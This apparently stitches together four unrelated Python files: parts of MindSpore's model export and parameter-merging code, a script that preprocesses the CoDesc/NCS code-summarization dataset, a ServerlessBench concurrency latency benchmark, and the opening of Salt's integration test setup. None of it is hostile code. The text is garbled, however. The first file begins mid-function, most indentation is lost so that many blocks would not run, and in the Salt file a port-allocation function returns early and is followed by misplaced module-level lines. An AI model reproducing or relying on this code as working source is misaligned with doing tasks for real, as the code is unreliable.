parameter_dict[param_name] = Parameter(Tensor(np_val), name=param_name)
load_param_into_net(net, parameter_dict)
def export(net, *inputs, file_name, file_format='AIR'):
"""
Export the MindSpore prediction model to a file in the specified format.
Args:
net (Cell): MindSpore network.
inputs (Tensor): Inputs of the `net`.
file_name (str): File name of the model to be exported.
file_format (str): MindSpore currently supports 'AIR', 'ONNX' and 'MINDIR' format for exported model.
- AIR: Ascend Intermediate Representation. An intermediate representation format of Ascend models.
Recommended suffix for output file is '.air'.
- ONNX: Open Neural Network eXchange. An open format built to represent machine learning models.
Recommended suffix for output file is '.onnx'.
- MINDIR: MindSpore Native Intermediate Representation for Anf. An intermediate representation format
for MindSpore models.
Recommended suffix for output file is '.mindir'.
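Examples:
>>> # a minimal sketch; assumes `net` is an nn.Cell and `input_tensor` matches its expected inputs
>>> export(net, input_tensor, file_name="net.onnx", file_format="ONNX")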
"""
logger.info("exporting model file:%s format:%s.", file_name, file_format)
check_input_data(*inputs, data_class=Tensor)
if file_format == 'GEIR':
logger.warning(f"Format 'GEIR' is deprecated, it would be removed in future release, use 'AIR' instead.")
file_format = 'AIR'
supported_formats = ['AIR', 'ONNX', 'MINDIR']
if file_format not in supported_formats:
raise ValueError(f'Illegal file format {file_format}, it must be one of {supported_formats}')
# When dumping an ONNX file, switch the network to inference mode if it is training (NOTE: ONNX is only designed for prediction)
is_dump_onnx_in_training = net.training and file_format == 'ONNX'
if is_dump_onnx_in_training:
net.set_train(mode=False)
# export model
net.init_parameters_data()
if file_format == 'AIR':
phase_name = 'export.air'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name)
_executor.export(file_name, graph_id)
elif file_format == 'ONNX': # file_format is 'ONNX'
phase_name = 'export.onnx'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name, do_convert=False)
onnx_stream = _executor._get_func_graph_proto(graph_id)
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IWUSR | stat.S_IRUSR)
f.write(onnx_stream)
elif file_format == 'MINDIR': # file_format is 'MINDIR'
phase_name = 'export.mindir'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name, do_convert=False)
onnx_stream = _executor._get_func_graph_proto(graph_id, 'mind_ir')
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IWUSR | stat.S_IRUSR)
f.write(onnx_stream)
# restore network training mode
if is_dump_onnx_in_training:
net.set_train(mode=True)
def parse_print(print_file_name):
"""
Loads Print data from a specified file.
Args:
print_file_name (str): The file name of saved print data.
Returns:
List, element of list is Tensor.
Raises:
ValueError: The print file may be empty; please make sure you entered the correct file name.
"""
print_file_path = os.path.realpath(print_file_name)
if os.path.getsize(print_file_path) == 0:
raise ValueError("The print file may be empty, please make sure enter the correct file name.")
logger.info("Execute load print process.")
print_list = Print()
try:
with open(print_file_path, "rb") as f:
pb_content = f.read()
print_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the print file %s, please check the correct of the file.", print_file_name)
raise ValueError(e.__str__())
tensor_list = []
try:
for print_ in print_list.value:
# String type
if print_.HasField("desc"):
tensor_list.append(print_.desc)
elif print_.HasField("tensor"):
dims = print_.tensor.dims
data_type = print_.tensor.tensor_type
data = print_.tensor.tensor_content
np_type = tensor_to_np_type[data_type]
param_data = np.frombuffer(data, np_type)  # np.fromstring is deprecated for binary data; frombuffer is equivalent here
ms_type = tensor_to_ms_type[data_type]
param_dim = []
for dim in dims:
param_dim.append(dim)
if param_dim:
param_value = param_data.reshape(param_dim)
tensor_list.append(Tensor(param_value, ms_type))
# Scalar type
else:
data_type_ = data_type.lower()
if 'float' in data_type_:
param_data = float(param_data[0])
elif 'int' in data_type_:
param_data = int(param_data[0])
elif 'bool' in data_type_:
param_data = bool(param_data[0])
tensor_list.append(Tensor(param_data, ms_type))
except BaseException as e:
logger.error("Failed to load the print file %s.", print_list)
raise RuntimeError(e.__str__())
return tensor_list
def _merge_param_with_strategy(sliced_data, parameter_name, strategy, is_even):
"""
Merge data slices into one tensor holding the whole data when strategy is not None.
Args:
sliced_data (list[numpy.ndarray]): Data slices in order of rank_id.
parameter_name (str): Name of parameter.
strategy (dict): Parameter slice strategy.
is_even (bool): Slicing manner: True means the parameter was sliced evenly, False means it was sliced unevenly.
Returns:
Tensor, the merged Tensor which has the whole data.
Raises:
ValueError: Failed to merge.
"""
layout = strategy.get(parameter_name)
try:
dev_mat = list(layout.dev_matrix[0].dim)
tensor_map = list(layout.tensor_map[0].dim)
param_split_shape = list(layout.param_split_shape[0].dim)
field_size = int(layout.field)
except BaseException as e:
raise ValueError(f"{e.__str__()}. please make sure that strategy matches the node_strategy.proto.")
device_count = 1
for dim in dev_mat:
device_count *= dim
if len(sliced_data) != device_count:
raise ValueError(f"The sliced_parameters length should be equal to device_count. "
f"the sliced_parameters length is {len(sliced_data)} but device_count is {device_count}.")
merged_tensor = None
if not param_split_shape:
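# evenly split parameter: concatenate the slices and reshape them using the device matrix and tensor map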
if not is_even:
raise ValueError("The shape of every parameter in sliced_parameters should be the same "
"when slice manner is even.")
all_gather_tensor = Tensor(np.concatenate(sliced_data))
if field_size > 0:
from mindspore.parallel._tensor import _reshape_param_data_with_weight
merged_tensor = _reshape_param_data_with_weight(all_gather_tensor, dev_mat, [field_size])
else:
from mindspore.parallel._tensor import _reshape_param_data
merged_tensor = _reshape_param_data(all_gather_tensor, dev_mat, tensor_map)
else:
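# unevenly split parameter: reorder slices by their computed slice index, then concatenate dimension by dimension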
from mindspore.parallel._tensor import _get_tensor_strategy, _get_tensor_slice_index
tensor_strategy = _get_tensor_strategy(dev_mat, tensor_map)
slice_count = 1
for dim in tensor_strategy:
slice_count *= dim
if len(param_split_shape) != slice_count:
raise ValueError(f"The param_split_shape length in strategy should be {slice_count}, "
f"but got {len(param_split_shape)}.")
tensor_slices_new = list(range(slice_count))
tensor_slices = sliced_data
for i in range(device_count):
slice_index = int(_get_tensor_slice_index(dev_mat, tensor_strategy, tensor_map, i))
if tensor_slices[i].shape[0] != param_split_shape[slice_index]:
raise ValueError(f"The slice {slice_index} is {param_split_shape[slice_index]} in 0 axis, "
f"but got {tensor_slices[i].shape[0]}.")
tensor_slices_new[slice_index] = np.array(tensor_slices[i])
dim_len = len(tensor_strategy)
for i in range(dim_len):
ele_count = int(len(tensor_slices_new) / tensor_strategy[dim_len - 1 - i])
tensor_slices_new_inner = []
for j in range(ele_count):
new_tensor = tensor_slices_new[j * tensor_strategy[dim_len - 1 - i]]
for l in range(j * tensor_strategy[dim_len - 1 - i] + 1,
(j + 1) * tensor_strategy[dim_len - 1 - i]):
new_tensor = np.concatenate((new_tensor, tensor_slices_new[l]), axis=dim_len - 1 - i)
tensor_slices_new_inner.insert(len(tensor_slices_new_inner), np.array(new_tensor))
tensor_slices_new = tensor_slices_new_inner
merged_tensor = Tensor(tensor_slices_new[0])
return merged_tensor
def build_searched_strategy(strategy_filename):
"""
Build strategy of every parameter in network.
Args:
strategy_filename (str): Name of strategy file.
Returns:
Dictionary, whose key is parameter name and value is slice strategy of this parameter.
Raises:
ValueError: Strategy file is incorrect.
TypeError: Strategy_filename is not str.
Examples:
>>> strategy_filename = "./strategy_train.ckpt"
>>> strategy = build_searched_strategy(strategy_filename)
"""
if not isinstance(strategy_filename, str):
raise TypeError(f"The strategy_filename should be str, but got {type(strategy_filename)}.")
if not os.path.isfile(strategy_filename):
raise ValueError(f"No such strategy file: {strategy_filename}.")
if os.path.getsize(strategy_filename) == 0:
raise ValueError("The strategy file should not be empty.")
parallel_strategy_map = ParallelStrategyMap()
with open(strategy_filename, 'rb') as f:
pb_content = f.read()
parallel_strategy_map.ParseFromString(pb_content)
layout_items = parallel_strategy_map.parallel_layout_item
if not layout_items:
raise ValueError("The strategy file has no sliced parameter.")
strategy = {}
for layout_item in layout_items:
parameter_name = layout_item.param_name
layout = layout_item.parallel_layouts
strategy[parameter_name] = layout
return strategy
def merge_sliced_parameter(sliced_parameters, strategy=None):
"""
    Merge parameter slices into one whole parameter.
Args:
sliced_parameters (list[Parameter]): Parameter slices in order of rank_id.
        strategy (dict): Parameter slice strategy. Default: None.
            If strategy is None, the parameter slices are merged in rank order along axis 0.
- key (str): Parameter name.
- value (<class 'node_strategy_pb2.ParallelLayouts'>): Slice strategy of this parameter.
Returns:
Parameter, the merged parameter which has the whole data.
Raises:
ValueError: Failed to merge.
TypeError: The sliced_parameters is incorrect or strategy is not dict.
KeyError: The parameter name is not in keys of strategy.
Examples:
>>> strategy = build_searched_strategy("./strategy_train.ckpt")
>>> sliced_parameters = [
>>> Parameter(Tensor(np.array([0.00023915, 0.00013939, -0.00098059])),
>>> "network.embedding_table"),
>>> Parameter(Tensor(np.array([0.00015815, 0.00015458, -0.00012125])),
>>> "network.embedding_table"),
>>> Parameter(Tensor(np.array([0.00042165, 0.00029692, -0.00007941])),
>>> "network.embedding_table"),
>>> Parameter(Tensor(np.array([0.00084451, 0.00089960, -0.00010431])),
>>> "network.embedding_table")]
>>> merged_parameter = merge_sliced_parameter(sliced_parameters, strategy)
"""
if not isinstance(sliced_parameters, list):
raise TypeError(f"The sliced_parameters should be list, but got {type(sliced_parameters)}.")
if not sliced_parameters:
raise ValueError("The sliced_parameters should not be empty.")
if strategy and not isinstance(strategy, dict):
raise TypeError(f"The strategy should be dict, but got {type(strategy)}.")
try:
parameter_name = sliced_parameters[0].name
parameter_shape = sliced_parameters[0].data.shape
parameter_shape_length = len(parameter_shape)
except BaseException as e:
raise TypeError(f"{e.__str__()}. the element in sliced_parameters should be Parameter.")
is_even = True
for index, parameter in enumerate(sliced_parameters):
if not isinstance(parameter, Parameter):
raise TypeError(f"The element in sliced_parameters should be Parameter, "
f"but got {type(parameter)} at index {index}.")
if parameter.name != parameter_name \
or len(parameter.data.shape) != parameter_shape_length \
or parameter.data.shape[1:] != parameter_shape[1:]:
raise ValueError("Please make sure that the elements in slice_parameters have the same name, "
"dimension length and shape except 0 axis")
if parameter.data.shape != parameter_shape:
is_even = False
layerwise_parallel = sliced_parameters[0].layerwise_parallel
requires_grad = sliced_parameters[0].requires_grad
sliced_data = [parameter.data.asnumpy() for parameter in sliced_parameters]
merged_parameter = None
if not strategy:
merged_tensor = Tensor(np.concatenate(sliced_data))
merged_parameter = Parameter(merged_tensor, parameter_name, requires_grad, layerwise_parallel)
else:
if parameter_name not in strategy.keys():
raise KeyError(f"The parameter name should be one key of strategy. "
f"the parameter name is {parameter_name}.")
merged_tensor = _merge_param_with_strategy(sliced_data, parameter_name, strategy, is_even)
merged_parameter = Parameter(merged_tensor, parameter_name, requires_grad, layerwise_parallel)
return merged_parameter
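# --- Editor's addition: hedged usage sketch ----------------------------------
# Minimal illustration of merge_sliced_parameter without a strategy file: the
# rank-ordered slices are simply concatenated along axis 0. Parameter names and
# values below are illustrative only.
def _merge_without_strategy_example():
    slices = [
        Parameter(Tensor(np.array([0.1, 0.2])), "network.embedding_table"),
        Parameter(Tensor(np.array([0.3, 0.4])), "network.embedding_table"),
    ]
    # With strategy=None the two rank slices are joined in order on axis 0,
    # producing a Parameter whose data is [0.1, 0.2, 0.3, 0.4].
    return merge_sliced_parameter(slices)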
|
Preprocess_NCS.py
|
# %% [markdown]
# # Imports
# %%
import os
import shutil
import time
import datetime
import json
import jsonlines
import pickle
import sys
import gc
import numpy as np
import pandas as pd
import random
import math
# %%
import multiprocessing
NUM_CORES = 6
# %%
ERROR_STRING = "__ERROR__"
# %% [markdown]
# # Output Location
# %%
OUTPUT_FOLDER = "data/ncs_preprocessed_data/"
divs = ["train-CoDesc", "train", "dev", "test"]
for div in divs:
    folder = OUTPUT_FOLDER + div + "/"
    # os.system('mkdir -p $folder') does not expand the Python variable; create the directory directly.
    os.makedirs(folder, exist_ok=True)
# %%
AVOID_DICT = {}
SEPARATOR = '<SEP>'
# %% [markdown]
# # Load CoDesc
# %%
CoDesc_FOLDER = "data/CoDesc/"
# %%
in_file = open(CoDesc_FOLDER+"CoDesc.json", 'r')
CoDesc_data = json.load(in_file)
in_file.close()
# %%
in_file = open(CoDesc_FOLDER+"src2id.json", 'r')
src2id_dict = json.load(in_file)
in_file.close()
# %%
# id2src_df = pd.read_csv(CoDesc_FOLDER+"id2src.csv")
# id2src_df
# %%
len(CoDesc_data) # 4211516
# %%
# Remove some fields to optimize memory consumption
for idx in range(len(CoDesc_data)):
CoDesc_data[idx].pop('src')
CoDesc_data[idx].pop('src_div')
CoDesc_data[idx].pop('src_idx')
CoDesc_data[idx].pop('original_code')
CoDesc_data[idx].pop('original_nl')
gc.collect()
# %% [markdown]
# # Tokenizer
# %%
from Tokenizer.CodePreprocess_final import code_filter
from Tokenizer.NLPreprocess_final import nl_filter
# %%
NCS_code_filter_flags = {
"tokenize and remove_comments": "true",
"remove_escape_charaters": "true",
"subtokenize_camel_case": "true",
"subtokenize_snake_case": "true",
"subtokenize_str_int_str": "true",
"replace_string_literal_with": "STRING", # "as in original data"
"replace_int_literal_with": "NUM", # "as in original data"
"replace_float_literal_with": "NUM", # "as in original data"
"replace_bool_literal_with": "BOOL", # "as in original data"
"remove_non_ascii": "true",
"delete_when_total_token_is_less_than": 3,
"maximum_length": 100000
}
with open('code_filter_flag.json', 'w') as outfile:
json.dump(NCS_code_filter_flags, outfile, indent=2)
outfile.close()
NCS_nl_filter_flags = {
"to_lower_case": "true",
"tokenize": "true",
"remove_escape_charaters": "true",
"subtokenize_camel_case": "true",
"subtokenize_snake_case": "true",
"subtokenize_str_int_str": "true",
"remove_parameter_return_throws_info": "true",
"remove_non_ascii": "true",
"remove_comment_tags": "true",
"remove_html_tags": "true",
"remove_@link_@code_@inheritDoc": "true",
"remove_begin_end_user_doc": "true",
"maximum_length": 50000,
"minimum_alphabet_count": 2,
"remove_unwanted_symbol": "true"
}
with open('nl_filter_flag.json', 'w') as outfile:
json.dump(NCS_nl_filter_flags, outfile, indent=2)
outfile.close()
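# %%
# Editor's addition (hedged smoke test): run the two filters once on a tiny
# hand-written pair to confirm the flag files written above behave as expected.
# The exact token output depends on the Tokenizer package, so this is only an
# illustrative check, not part of the original pipeline.
example_code = "public int addNumbers(int firstValue, int secondValue) { return firstValue + secondValue; }"
example_nl = "Adds two numbers and returns the sum."
print(code_filter(example_code, NCS_code_filter_flags))
print(nl_filter(example_nl, NCS_nl_filter_flags))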
# %% [markdown]
# # Multiprocessing Tokenize CoDesc Codes and Save
# %%
# multiprocessing
def worker_function(worker_data, code_dict):
print("WORKER START : ", worker_data[0]['id'], worker_data[-1]['id'])
for sample in worker_data:
if sample['id'] % 10000 == 0:
print(datetime.datetime.now(), ":", sample['id'])
try:
code_dict[sample['id']] = code_filter(sample['code'], NCS_code_filter_flags).strip()
except:
code_dict[sample['id']] = ERROR_STRING
print("WORKER END : ", worker_data[0]['id'], worker_data[-1]['id'])
# %%
manager = multiprocessing.Manager()
shared_code_dict = manager.dict()
worker_amount = math.floor(len(CoDesc_data)/NUM_CORES)
workers = []
for i in range(NUM_CORES):
low = i*worker_amount
if i == NUM_CORES-1:
high = len(CoDesc_data)
else:
high = low+worker_amount
w = multiprocessing.Process(target=worker_function, args=(CoDesc_data[low:high], shared_code_dict))
workers.append(w)
w.start()
for w in workers:
w.join()
# %%
tokenized_code_dict = shared_code_dict.copy()
del shared_code_dict
gc.collect()
# %%
tokenized_code_dict[100]
# %%
CoDesc_data[100]
# %%
with open("data/ncs_tokenized_code.json", 'w') as outfile:
json.dump(tokenized_code_dict, outfile, indent = 2)
outfile.close()
# %%
del tokenized_code_dict
gc.collect()
# %%
# %% [markdown]
# # Tokenize and Create NCS test, valid, and train sets
# %%
AVOID_DICT = {}
SEPARATOR = '<SEP>'
# %%
divs = ["train", "dev", "test"]
INPUT_FOLDER = "data/original_data/"+"ncs/"
for div in divs:
print(div)
err = 0
empty = 0
success = 0
code_file = open(INPUT_FOLDER+div+"/code.original_subtoken", 'r')
code_lines = code_file.readlines()
code_file.close()
nl_file = open(INPUT_FOLDER+div+"/javadoc.original", 'r')
nl_lines = nl_file.readlines()
nl_file.close()
code_file = open(OUTPUT_FOLDER+div+"/code.original_subtoken", 'w', encoding='ascii')
nl_file = open(OUTPUT_FOLDER+div+"/javadoc.original", 'w', encoding='ascii')
for idx in range(len(nl_lines)):
try:
tokenized_code = code_filter(code_lines[idx], NCS_code_filter_flags).encode('ascii', errors='ignore').decode().strip()
tokenized_nl = nl_filter(nl_lines[idx], NCS_nl_filter_flags).encode('ascii', errors='ignore').decode().strip()
except:
err += 1
continue
if tokenized_code == "" or tokenized_nl == "":
empty += 1
continue
AVOID_DICT[tokenized_code+SEPARATOR+tokenized_nl] = 1
code_file.write(tokenized_code+"\n")
nl_file.write(tokenized_nl+"\n")
success += 1
print("Error :", err)
print("Empty :", empty)
print("Success :", success)
code_file.close()
nl_file.close()
del code_lines
del nl_lines
gc.collect()
# %% [markdown]
# # Load Tokenized Code
# %%
in_file = open("data/ncs_tokenized_code.json", 'r')
tokenized_code_dict = json.load(in_file)
in_file.close()
# %%
for idx in range(len(CoDesc_data)):
CoDesc_data[idx]['code'] = tokenized_code_dict[str(idx)].encode('ascii', errors='ignore').decode().strip()
CoDesc_data[idx]['nl'] = CoDesc_data[idx]['nl'].encode('ascii', errors='ignore').decode().strip()
# %%
del tokenized_code_dict
gc.collect()
# %%
CoDesc_data[100]
# %% [markdown]
# # Initial Selection of IDs for train, valid and test sets
# %%
truncated_ids = src2id_dict['CodeSearchNet-Py2Java']["truncated"]
print(len(truncated_ids))
# %%
avoid_ids = []
avoid_ids.extend(truncated_ids)
print(len(avoid_ids))
avoid_id_dict = {}
for a_id in avoid_ids:
avoid_id_dict[a_id] = 1
# %%
train_ids_pass1 = []
for candidate_id in range(len(CoDesc_data)):
if candidate_id % 1000000 == 0:
print(datetime.datetime.now(), ":", candidate_id)
try:
string = avoid_id_dict[candidate_id]
except KeyError:
train_ids_pass1.append(candidate_id)
print(len(train_ids_pass1))
# %% [markdown]
# # Duplicate Removal
# %%
train_ids_pass2 = []
errors = []
empty = []
for candidate_id in train_ids_pass1:
if candidate_id % 1000000 == 0:
print(datetime.datetime.now(), ":", candidate_id)
check_str = CoDesc_data[candidate_id]['code']+SEPARATOR+CoDesc_data[candidate_id]['nl']
if check_str.startswith(ERROR_STRING) or check_str.endswith(ERROR_STRING):
errors.append(candidate_id)
continue
elif check_str.startswith(SEPARATOR) or check_str.endswith(SEPARATOR):
empty.append(candidate_id)
continue
try:
mystr = AVOID_DICT[check_str]
except KeyError:
AVOID_DICT[check_str] = 1
train_ids_pass2.append(candidate_id)
# %%
print("ERROR PARSING CODE :", len(errors)) # 14163
print("EMPTY NL or Code :", len(empty)) # 0
print("Duplicate :", (len(train_ids_pass1)-len(train_ids_pass2)-len(empty)-len(errors))) # 83105
print("REMAINING TRAIN:", len(train_ids_pass2))
# %%
del AVOID_DICT
del avoid_ids
del avoid_id_dict
gc.collect()
# %%
# %% [markdown]
# # Creating train-CoDesc set
# %%
train_ids = train_ids_pass2
id_dict = {}
id_dict['train'] = train_ids
# %%
div = "train-CoDesc"
print(div)
code_file = open(OUTPUT_FOLDER+div+"/code.original_subtoken", 'w', encoding='ascii')
nl_file = open(OUTPUT_FOLDER+div+"/javadoc.original", 'w', encoding='ascii')
for sample_id in train_ids:
code_file.write(CoDesc_data[sample_id]['code']+"\n")
nl_file.write(CoDesc_data[sample_id]['nl']+"\n")
code_file.close()
nl_file.close()
# %%
with open(OUTPUT_FOLDER+"ncs-CoDesc_train_ids.json", 'w') as outfile:
json.dump(id_dict, outfile)
outfile.close()
# %%
# %% [markdown]
# # Clean Memory
# %%
del CoDesc_data
del src2id_dict
del id_dict
gc.collect()
|
run.py
|
# Copyright (c) 2020 Institution of Parallel and Distributed System, Shanghai Jiao Tong University
# ServerlessBench is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
import os
import threading
import time
import sys, getopt
def client(i,results,loopTimes):
print("client %d start" %i)
command = "./single-cold_warm.sh -R -t " + str(loopTimes)
r = os.popen(command)
text = r.read()
results[i] = text
print("client %d finished" %i)
def warmup(i,warmupTimes,actionName,params):
for j in range(warmupTimes):
r = os.popen("wsk -i action invoke %s %s --result --blocking" %(actionName,params))
text = r.read()
print("client %d warmup finished" %i)
def main():
argv = getargv()
clientNum = argv[0]
loopTimes = argv[1]
warmupTimes = argv[2]
threads = []
containerName = "complexjava"
actionName = "complex-java"
params = "--param-file base64_param.json"
r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" %containerName)
r.read()
# First: warm up
for i in range(clientNum):
t = threading.Thread(target=warmup,args=(i,warmupTimes,actionName,params))
threads.append(t)
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
print("Warm up complete")
# Second: invoke the actions
# Initialize the results and the clients
threads = []
results = []
for i in range(clientNum):
results.append('')
# Create the clients
for i in range(clientNum):
t = threading.Thread(target=client,args=(i,results,loopTimes))
threads.append(t)
# start the clients
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
outfile = open("result.csv","w")
outfile.write("invokeTime,startTime,endTime\n")
latencies = []
minInvokeTime = 0x7fffffffffffffff
maxEndTime = 0
for i in range(clientNum):
# get and parse the result of a client
clientResult = parseResult(results[i])
# print the result of every loop of the client
for j in range(len(clientResult)):
outfile.write(clientResult[j][0] + ',' + clientResult[j][1] + \
',' + clientResult[j][2] + '\n')
# Collect the latency
latency = int(clientResult[j][-1]) - int(clientResult[j][0])
latencies.append(latency)
# Find the first invoked action and the last return one.
if int(clientResult[j][0]) < minInvokeTime:
minInvokeTime = int(clientResult[j][0])
if int(clientResult[j][-1]) > maxEndTime:
maxEndTime = int(clientResult[j][-1])
formatResult(latencies,maxEndTime - minInvokeTime, clientNum, loopTimes, warmupTimes)
def parseResult(result):
lines = result.split('\n')
parsedResults = []
for line in lines:
if line.find("invokeTime") == -1:
continue
        parsedTimes = ['', '', '']
        i = 0
        count = 0
        # Scan the line once for up to three 13-digit epoch-millisecond timestamps
        # (invokeTime, startTime, endTime). A single combined loop also avoids
        # spinning forever on a malformed line with fewer than three numbers.
        while i < len(line) and count < 3:
            if line[i].isdigit():
                parsedTimes[count] = line[i:i + 13]
                i += 13
                count += 1
            else:
                i += 1
        parsedResults.append(parsedTimes)
return parsedResults
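# Editor's note (hedged example): parseResult assumes each result line carries
# three 13-digit epoch-millisecond timestamps in order (invokeTime, startTime,
# endTime); the exact wording of the line comes from single-cold_warm.sh and is
# only assumed here. For instance:
#   parseResult("invokeTime: 1600000000000 startTime: 1600000000123 endTime: 1600000000456")
#   -> [['1600000000000', '1600000000123', '1600000000456']]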
def getargv():
if len(sys.argv) != 3 and len(sys.argv) != 4:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
exit(0)
if not str.isdigit(sys.argv[1]) or not str.isdigit(sys.argv[2]) or int(sys.argv[1]) < 1 or int(sys.argv[2]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Client number and loop times must be an positive integer")
exit(0)
if len(sys.argv) == 4:
if not str.isdigit(sys.argv[3]) or int(sys.argv[3]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Warm up times must be an positive integer")
exit(0)
else:
return (int(sys.argv[1]),int(sys.argv[2]),1)
return (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))
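# Editor's note: for example, "python3 run.py 2 10 5" runs 2 concurrent clients
# with 10 measured loops each, after 5 warm-up invocations per client; the
# warm-up count defaults to 1 when the third argument is omitted.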
def formatResult(latencies,duration,client,loop,warmup):
requestNum = len(latencies)
latencies.sort()
duration = float(duration)
# calculate the average latency
total = 0
for latency in latencies:
total += latency
print("\n")
print("------------------ result ---------------------")
averageLatency = float(total) / requestNum
_50pcLatency = latencies[int(requestNum * 0.5) - 1]
_75pcLatency = latencies[int(requestNum * 0.75) - 1]
_90pcLatency = latencies[int(requestNum * 0.9) - 1]
_95pcLatency = latencies[int(requestNum * 0.95) - 1]
_99pcLatency = latencies[int(requestNum * 0.99) - 1]
print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
print("%.2f\t%d\t%d\t%d\t%d\t%d" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
print("throughput (n/s):\n%.2f" %(requestNum / (duration/1000)))
# output result to file
resultfile = open("eval-result.log","a")
resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
resultfile.write("client: %d, loop_times: %d, warup_times: %d\n" % (client, loop, warmup))
resultfile.write("%d requests finished in %.2f seconds\n" %(requestNum, (duration/1000)))
resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
resultfile.write("throughput (n/s):\n%.2f\n" %(requestNum / (duration/1000)))
main()
|
__init__.py
|
# -*- coding: utf-8 -*-
'''
Set up the Salt integration test suite
'''
# Import Python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import time
import stat
import errno
import signal
import shutil
import pprint
import atexit
import socket
import logging
import tempfile
import threading
import subprocess
import multiprocessing
from datetime import datetime, timedelta
try:
import pwd
except ImportError:
pass
# Import salt tests support dirs
from tests.support.paths import * # pylint: disable=wildcard-import
from tests.support.processes import * # pylint: disable=wildcard-import
from tests.support.unit import TestCase
from tests.support.case import ShellTestCase
from tests.support.parser import PNUM, print_header, SaltTestcaseParser
from tests.support.helpers import requires_sshd_server, RedirectStdStreams
from tests.support.paths import ScriptPathMixin
from tests.support.mixins import CheckShellBinaryNameAndVersionMixin, ShellCaseCommonTestsMixin
from tests.support.mixins import AdaptedConfigurationTestCaseMixin, SaltClientTestCaseMixin
from tests.support.mixins import SaltMinionEventAssertsMixin, SaltReturnAssertsMixin
from tests.support.runtests import RUNTIME_VARS
# Import Salt libs
import salt
import salt.config
import salt.master
import salt.minion
import salt.runner
import salt.output
import salt.version
import salt.utils.color
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.process
import salt.utils.stringutils
import salt.utils.yaml
import salt.log.setup as salt_log_setup
from salt.utils.verify import verify_env
from salt.utils.immutabletypes import freeze
from salt.exceptions import SaltClientError
# Import 3rd-party libs
import msgpack
from salt.ext import six
try:
import salt.ext.six.moves.socketserver as socketserver
except ImportError:
import socketserver
# Import salt tests support libs
from tests.support.processes import SaltMaster, SaltMinion, SaltSyndic
log = logging.getLogger(__name__)
_RUNTESTS_PORTS = {}
def get_unused_localhost_port():
'''
Return a random unused port on localhost
'''
usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
usock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
usock.bind(('127.0.0.1', 0))
port = usock.getsockname()[1]
if port in (54505, 54506, 64505, 64506, 64507, 64508, 64510, 64511, 64520, 64521):
# These ports are hardcoded in the test configuration
port = get_unused_localhost_port()
usock.close()
return port
DARWIN = True if sys.platform.startswith('darwin') else False
BSD = True if 'bsd' in sys.platform else False
AIX = True if sys.platform.startswith('aix') else False
if (AIX or DARWIN) and port in _RUNTESTS_PORTS:
port = get_unused_localhost_port()
usock.close()
return port
_RUNTESTS_PORTS[port] = usock
if DARWIN or BSD or AIX:
usock.close()
return port
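# Editor's note: every port issued above is remembered in _RUNTESTS_PORTS so the
# same port is never handed out twice in one run. On Darwin/BSD/AIX the probe
# socket is closed immediately (presumably so the test daemons can bind the
# port), while on other platforms it stays bound until close_open_sockets runs
# at exit.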
def close_open_sockets(sockets_dict):
for port in list(sockets_dict):
sock = sockets_dict.pop(port)
sock.close()
atexit.register(close_open_sockets, _RUNTESTS_PORTS)
SALT_LOG_PORT = get_unused_localhost_port()
class ThreadingMixIn(socketserver.ThreadingMixIn):
daemon_threads = False
class ThreadedSocketServer(ThreadingMixIn, socketserver.TCPServer, object):
allow_reuse_address = True
def server_activate(self):
self.shutting_down = threading.Event()
super(ThreadedSocketServer, self).server_activate()
def server_close(self):
if hasattr(self, 'shutting_down'):
self.shutting_down.set()
super(ThreadedSocketServer, self).server_close()
class SocketServerRequestHandler(socketserver.StreamRequestHandler):
def handle(self):
unpacker = msgpack.Unpacker(encoding='utf-8')
while not self.server.shutting_down.is_set():
try:
wire_bytes = self.request.recv(1024)
if not wire_bytes:
break
unpacker.feed(wire_bytes)
for record_dict in unpacker:
record = logging.makeLogRecord(record_dict)
logger = logging.getLogger(record.name)
logger.handle(record)
del record_dict
except (EOFError, KeyboardInterrupt, SystemExit):
break
except socket.error as exc:
try:
if exc.errno == errno.WSAECONNRESET:
# Connection reset on windows
break
except AttributeError:
# We're not on windows
pass
log.exception(exc)
except Exception as exc:
log.exception(exc)
class TestDaemonStartFailed(Exception):
'''
Simple exception to signal that a test daemon failed to start
'''
class TestDaemon(object):
'''
Set up the master and minion daemons, and run related cases
'''
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 600
def __init__(self, parser):
self.parser = parser
self.colors = salt.utils.color.get_colors(self.parser.options.no_colors is False)
if salt.utils.platform.is_windows():
# There's no shell color support on windows...
for key in self.colors:
self.colors[key] = ''
def __enter__(self):
'''
Start a master and minion
'''
# Setup the multiprocessing logging queue listener
salt_log_setup.setup_multiprocessing_logging_listener(
self.master_opts
)
# Set up PATH to mockbin
self._enter_mockbin()
